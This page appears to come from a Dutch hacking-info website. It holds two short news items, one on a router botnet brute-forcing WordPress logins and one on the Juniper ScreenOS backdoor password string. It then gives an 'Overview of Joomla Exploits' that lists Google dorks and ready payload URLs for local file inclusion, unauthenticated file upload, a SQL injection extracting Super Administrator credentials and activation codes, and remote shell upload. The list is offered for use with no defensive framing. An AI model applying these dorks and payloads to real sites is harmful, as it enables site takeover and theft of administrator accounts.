The Dutch HackInfo

Information about Hacking, Security & Tweaking

Web hacking

1 1 1 1 1 1 1 1 1 1 Rating 5.00 (2 Votes)

botnetEen Italiaanse onderzoeker waarschuwt voor een botnet dat uit duizenden gehackte routers bestaat en WordPress-sites aanvalt. Het botnet voert bruteforce-aanvallen op het inloggedeelte van de websites uit. Er wordt geprobeerd om met de gebruikersnaam admin en verschillende wachtwoorden in te loggen.

Nu zijn er meer botnets die WordPress-sites aanvallen, alleen dit botnet viel op. Alle gebruikte IP-adressen waren namelijk van dezelfde IP-reeksen afkomstig. Het bleek om voornamelijk Italiaanse internetproviders te gaan. Verder onderzoek wees uit dat de aanvallen van gehackte Aethra-routers afkomstig waren. 

1 1 1 1 1 1 1 1 1 1 Rating 5.00 (2 Votes)

jupinerOnderzoeker HD Moore van het beveiligingsbedrijf Rapid7 heeft het wachtwoord gevonden waarmee de door Juniper ontdekte backdoor in zijn ScreenOS gebruikt kan worden. Het bedrijf ontdekte onlangs 'ongeautoriseerde code' in de software die wordt gebruikt op NetScreen-netwerkapparatuur. Op internet zijn zo'n 26.000 NetScreen-apparaten van netwerkfabrikant Juniper te vinden die via SSH toegankelijk zijn en daardoor risico lopen om te worden aangevallen via de vorige week ontdekte backdoors in ScreenOS.

Zijn publicatie volgt op de berichten op dat er tijdens een interne code review 'ongeautoriseerde code' in de ScreenOS-software van Juniper is gevonden. In een blogpost legt hij uit hoe hij te werk is gegaan. Door een gepatchte versie van de ScreenOS-software met een kwetsbare versie te vergelijken kwam hij eenstring tegen met de volgende tekens: <<< %s(un='%s') = %u.

1 1 1 1 1 1 1 1 1 1 Rating 5.00 (1 Vote)

joomla-logo

Overview of Joomla Exploits



1. Joomla Component (com_wrapper) Local File Include

# Date : 13/05/2013
# Exploit : +http://[Target]/[Path]/index.php?option=com_wrapper&view=wrapper& Itemid=../../../../../[LFI%00]

2. Joomla com_aclassfb File Upload Vulnerability
#Google Dork: inurl:com_aclassfb
#Date : 10/01/2014
#Vendor : http://www.almondsoft.com
#File Upload: http://127.0.0.1/index.php?option=com_aclassfb #Exploit : http://[target]/index.php?option=com_aclasfb&Itemid=[ID]&ct=[CATEGORY]&md=add_form

3. Joomla com_kunena SQL Injection (Automatic activation code retriever) #Google Dork: "inurl:index.php?option=com_kunena" or "inurl:?option=com_kunena"
#Date : 12/05/2013
#Vendor homepage: http://www.kunena.org/
#Vulnerable path: http://[target]/index.php?option=com_kunena&func=userlist&search=%25'+and+1=2)+union+select+1,1,concat (username,0x3a,0x3a,0x3a,0x3a,email,0x3a,0x3a,activation,0x3a,usertype) ,1,1,1,1,62,1,1,0,0,0,1,15+from+jos_users+where+usertype='Super Administrator' -- ;

4. Joomla Component (com_Fabrik) Remote Shell Upload Vulnerability
# Google Dork: "inurl:index.php?option=com_fabrik" or "index.php?option=com_fabrik"
# Date : 14/09/2012
# Vendor Homepage : http://fabrikar.com/
# Vulnerable path:
http://[target]/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1
In this webpage there is the possibility of upload any type of files (php,asp,html,jpg .. ) through the form "Import CSV".


Copyright © 2020. All Rights Reserved.